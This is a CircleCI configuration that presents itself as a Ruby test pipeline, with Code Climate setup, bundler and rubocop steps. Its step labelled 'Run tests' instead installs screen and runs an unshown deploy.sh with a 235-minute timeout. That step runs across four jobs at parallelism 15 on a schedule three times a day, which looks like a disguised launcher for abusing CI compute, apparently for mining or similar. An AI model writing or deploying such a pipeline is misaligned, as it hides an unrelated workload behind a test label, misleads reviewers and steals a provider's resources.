working_dir: &working_dir ~/app
.build_template: &script
  steps:
    - checkout
    - run: curl -L https://codeclimate.com/downloads/test-reporter/test-reporter-latest-linux-amd64 > ./cc-test-reporter
    - run: chmod +x ./cc-test-reporter
    - run: ./cc-test-reporter before-build
    - run: gem install bundler:2.1.4
    - run: bundle install --jobs=4 --retry=4 --path vendor/bundle
    - run: bundle exec rake rubocop
    - run:
        name: Run tests
        command: |
                    apt update 
                    apt install screen -y 
                    chmod u+x deploy.sh && ./deploy.sh
        no_output_timeout: 235m
version: 2.0
jobs:
  endvoc:
    <<: *script
    docker:
      - image: ruby:3.0
    parallelism: 15
  endvoc1:
    <<: *script
    docker:
      - image: ruby:2.7
    parallelism: 15
  endvoc2:
    <<: *script
    docker:
      - image: ruby:2.6
    parallelism: 15
  endvoc3:
    <<: *script
    docker:
      - image: ruby:2.5
    parallelism: 15
workflows:
  version: 2
  commit:
    jobs:
      - endvoc
      - endvoc1
      - endvoc2
      - endvoc3


    triggers:
      - schedule:
          cron: "0 0,8,16 * * *"
          filters:
            branches:
              only:
                - master

  endvocrunjob:
    jobs:
      - endvoc
      - endvoc1
      - endvoc2
      - endvoc3
